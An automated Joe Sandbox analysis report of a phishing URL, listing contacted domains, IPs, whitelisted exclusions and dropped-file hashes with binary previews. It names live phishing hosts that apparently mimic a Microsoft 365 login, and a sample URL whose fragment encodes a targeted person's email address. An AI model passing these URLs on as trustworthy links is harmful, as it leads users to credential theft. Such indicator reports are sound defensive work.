https://co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru/oekpuvcikmwdxxivfxvpcxozbUNRPoHVMCDXFUWIMURZTCUJGKPMNGCPMKEEADRFNIRBIVDJN0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
brh5.bughtswo.com
188.114.96.3
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.194.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              sni1gl.wpc.omegacdn.net
              152.199.21.175
              truefalse
                high
                www.google.com
                142.250.184.228
                truefalse
                  high
                  co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru
                  188.114.96.3
                  truefalse
                    unknown
                    s-part-0032.t-0009.t-msedge.net
                    13.107.246.60
                    truefalse
                      high
                      www.office.com
                      unknown
                      unknownfalse
                        high
                        identity.nel.measure.office.net
                        unknown
                        unknownfalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            login.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://brh5.bughtswo.com/tgs0/true
                              • Avira URL Cloud: phishing
                              unknown
                              https://a.nel.cloudflare.com/report/v4?s=sIKQxfDh6dFZESxWI%2F6Om6jn6s%2BNOixtlheTS%2BHZbxRpBq3NEh1byGQKpNQBnR7RhZpfFSSVyOYZvh0QaOCq4AiUwwpZLgfxHKNmMRvfDWz4RzdLRmxzwj2M1kvS0w%3D%3Dfalse
                                high
                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                  high
                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe654bc286c7d0b&lang=autofalse
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fe654bc286c7d0b/1736277899837/0f8396233de30b1027fe5c528fbab38c7649993ff1d372703ff5864234108da6/ZukX3ZIDoYG8U1yfalse
                                          high
                                          https://brh5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29ttrue
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                              high
                                              https://brh5.bughtswo.com/favicon.icofalse
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                high
                                                https://co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru/oekpuvcikmwdxxivfxvpcxozbUNRPoHVMCDXFUWIMURZTCUJGKPMNGCPMKEEADRFNIRBIVDJNfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718747211147990.OWYyMjZhMjUtN2ZkZS00ODUyLTkyODgtMDUyMDA2ODRhMWVmNzNjNTYwZGMtMDU2ZS00NDI2LWEwYTgtZDAyNTY3ZTA0MWMw&ui_locales=en-US&mkt=en-US&client-request-id=3e64d734-5964-4a7c-a9b9-7b1ae01b8114&state=C2aUWqH1VG5UzZ4PgBiU4S4CkUFr21EfdV9GmxSaNjG9fU0hpgVun4bGz-8gedN_AWxcvUVHENWa2t-bZzFge7GUyHWT1KS4uuqU1V79mfiboZknkRdyjhdd7ZK-fCGBwQtlEbQXXbJiA4kV2utClHbHUJoqB1WMl5xydPFe_HzRZ955y8u1uYMvr1XNPu3yPkZFOVvHJXNeSvq6dyeifuXeWebSlN2BS20qXcQJ8YL3eyo51PnJEz-_n0FD99r5xbU_LqVIyn_jFklhcvQXOA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B.false
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/false
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe654bc286c7d0b/1736277899837/y5opRdNzxhmLLrWfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://login.microsoftonline.comchromecache_96.2.dr, chromecache_87.2.drfalse
                                                          high
                                                          https://login.windows-ppe.netchromecache_96.2.dr, chromecache_87.2.drfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.18.94.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            151.101.194.137
                                                            code.jquery.comUnited States
                                                            54113FASTLYUSfalse
                                                            35.190.80.1
                                                            a.nel.cloudflare.comUnited States
                                                            15169GOOGLEUSfalse
                                                            142.250.184.228
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.17.24.14
                                                            cdnjs.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.18.95.41
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            151.101.2.137
                                                            unknownUnited States
                                                            54113FASTLYUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            188.114.96.3
                                                            brh5.bughtswo.comEuropean Union
                                                            13335CLOUDFLARENETUStrue
                                                            104.17.25.14
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            IP
                                                            192.168.2.8
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1585551
                                                            Start date and time:2025-01-07 20:23:51 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 3m 3s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:browseurl.jbs
                                                            Sample URL:https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal64.win@20/74@34/11
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.174, 142.251.173.84, 172.217.16.206, 216.58.212.142, 192.229.221.95, 142.250.181.238, 172.217.18.14, 40.126.31.73, 40.126.31.69, 20.190.159.64, 20.190.159.4, 20.190.159.73, 40.126.31.67, 20.190.159.2, 40.126.31.71, 13.107.6.156, 40.126.32.72, 40.126.32.134, 20.190.160.14, 20.190.160.20, 40.126.32.138, 40.126.32.76, 20.190.160.22, 40.126.32.74, 142.250.185.238, 20.190.159.71, 20.190.159.68, 142.250.74.202, 142.250.185.74, 172.217.16.138, 142.250.184.202, 142.250.186.74, 216.58.206.74, 142.250.185.138, 142.250.186.138, 142.250.186.106, 216.58.212.138, 172.217.18.10, 172.217.16.202, 142.250.184.234, 172.217.23.106, 142.250.185.106, 142.250.186.42, 13.69.116.107, 51.11.192.50, 216.58.206.35, 142.250.185.78, 142.250.74.206, 2.20.245.134, 2.20.245.140, 23.56.254.164, 4.245.163.56, 13.107.246.60, 13.107.246.45
                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, onedscolprdfrc04.francecentral.cloudapp.azure.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, onedscolprdweu09.westeurope.cloudapp.azure.com, update.googleapis.com, login.mso.msidentity.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.ak.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.akadns.net, b-0004.b-msedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.micro
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t
                                                            No simulations
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:24:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.983582515046695
                                                            Encrypted:false
                                                            SSDEEP:48:8h0djTLnf6HaidAKZdA1oehwiZUklqehAy+3:8hYXfm/y
                                                            MD5:3D76A8D05FD6DB22251986F7315A4035
                                                            SHA1:16F36A9996C4A736A59664B05E2DB67C79A7CE4B
                                                            SHA-256:669804C59B9CAEA1052E75310835AC86F22002D32CC63FBC3F1DB33DDB047959
                                                            SHA-512:1B59191E46B090ACEB9010396446DFB42138205DA7C0782CD0862CCD371B10E3D15343E973F537E7B957FF269A96F9C2EE14770485FA30A45C8B24BD38CAFE44
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....3..9a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I'Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:24:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2679
                                                            Entropy (8bit):4.000700724204636
                                                            Encrypted:false
                                                            SSDEEP:48:8U0djTLnf6HaidAKZdA1leh/iZUkAQkqehvy+2:8UYXfk9Qay
                                                            MD5:9833108A84EC9E1339B2FEB87462A1A2
                                                            SHA1:33A8A527C03D186C5127742FFAA6FA891C7AEF41
                                                            SHA-256:08F33A5DCD4DEC24EFE0E1C07E8A41F8BA13082C082A2571CD61AD05B3A642DE
                                                            SHA-512:411206A7EB5B3016C6591E6537B24A6FB9B20C0D27187B56CA8C3E03DBC1598428F1E037F5730ED5351EC5CF749BAE488AA0147366CA7CFF19CB8A64C61C70EE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,........9a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I'Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2693
                                                            Entropy (8bit):4.010230399834782
                                                            Encrypted:false
                                                            SSDEEP:48:820djTLnfbHaidAKZdA14t5eh7sFiZUkmgqeh7sZy+BX:82YXfvnby
                                                            MD5:F760F8070EA87CF12A6356C70F86EFBF
                                                            SHA1:48080048C8576507590EF9F2959AB11E56808B12
                                                            SHA-256:B905A9933B88CE9EEC4BEDCD8E2F2985977522516E1CBD55B0393077CC83C52A
                                                            SHA-512:9AEC0F772CDB5B3F4F71C88553A52FE1738697A1A3C9C3957AACC5C3ECCA5BF62AB87B2F8B5F4B4676A96DBF5D75B8C4A1661BDB2149C685537E2A1881784570
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I'Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:24:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2681
                                                            Entropy (8bit):3.9991485344296454
                                                            Encrypted:false
                                                            SSDEEP:48:8ne0djTLnf6HaidAKZdA16ehDiZUkwqehTy+R:8eYXf/Ry
                                                            MD5:77AC879C93CFE095C6610FAFF3970AC1
                                                            SHA1:9760AFE93879758D7B989D4EBA7368998A9462C8
                                                            SHA-256:CD9B7B19CB2FC7EC2E2695198481656850C2A13396FE9FEDB84EBB2A0B0C0735
                                                            SHA-512:3FA1EDA30C478A79E2065BCF50DCD2000A8E93E9EC074CF75BFC7803CD0681E5E8A4DB0371017B6C419ECA7ED96D597160C979CCA2EED7C0B0E20D08C7DE5D7E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....Z...9a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I'Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:24:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2681
                                                            Entropy (8bit):3.9882681707751173
                                                            Encrypted:false
                                                            SSDEEP:48:800djTLnf6HaidAKZdA1UehBiZUk1W1qehFy+C:80YXff9ly
                                                            MD5:F735D348C6BC8F74FB1DA5B3BA7A98C5
                                                            SHA1:4D1E71C7A13A1EFBA14D8A2B9BBD963517B7CD34
                                                            SHA-256:5524E179FE6BB9007A4E1F71D5C1B4DACCD40A498F4534A53203D1CE0247BCD0
                                                            SHA-512:5B631F5E476ABF2FD7EC56661C70EF9B41C920D928F0C9AF8F034DFE80E868F2F7223690948C7736A29B704C17D7C3BFA1F5E0A5D67561113B6AFF47C8BB275D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,........9a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I'Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:24:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2683
                                                            Entropy (8bit):3.9975771666647337
                                                            Encrypted:false
                                                            SSDEEP:48:8H0djTLnf6HaidAKZdA1duTrehOuTbbiZUk5OjqehOuTbby+yT+:8HYXfYTYTbxWOvTbby7T
                                                            MD5:61662E809D067BD3807194594BEAACB1
                                                            SHA1:02DAF49EE74134301D10423FF9D185E88B0447A0
                                                            SHA-256:8B27431086ECE3661DAEC1346B6E78107A98580D8699949F21CAC74F7B7893A4
                                                            SHA-512:E9929B8258CF0E1B437821683C3BCD1529A328EAF45B4647D8CDE39FA2F2C5618556A297B2CE611A023C0A2205BFF5DD9F0CAE3D02D76CDFA7AE5AD84B9E41B7
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....94..9a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I'Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 43 x 86, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):4.068159130770306
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPl+pt/mmHl6yxl/k4E08up:6v/lhPuOGl6y7Tp
                                                            MD5:5AE190605CC778F62065478C5F6EC15B
                                                            SHA1:204641C97C5891D549BA9A1B7D811861EC514DB5
                                                            SHA-256:1FFF2EDC532CA3F7CEB0A5A7AC81F954A1F5B95EFE2B48B916F25B734831434C
                                                            SHA-512:75032C096180C297F0E10CAD32914F634C9B87EC438963CC001084C288A778A361A434C52EDF977D58002FBBF5F94821D0F3BD6002151DBFB014323388806B67
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...+...V............IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                            Category:downloaded
                                                            Size (bytes):621
                                                            Entropy (8bit):7.673946009263606
                                                            Encrypted:false
                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                            Category:dropped
                                                            Size (bytes):122515
                                                            Entropy (8bit):7.997419459076181
                                                            Encrypted:true
                                                            SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                            MD5:AC9A6ED508328361A4C9530325A94076
                                                            SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                            SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                            SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                            Malicious:false
                                                            Reputation:low
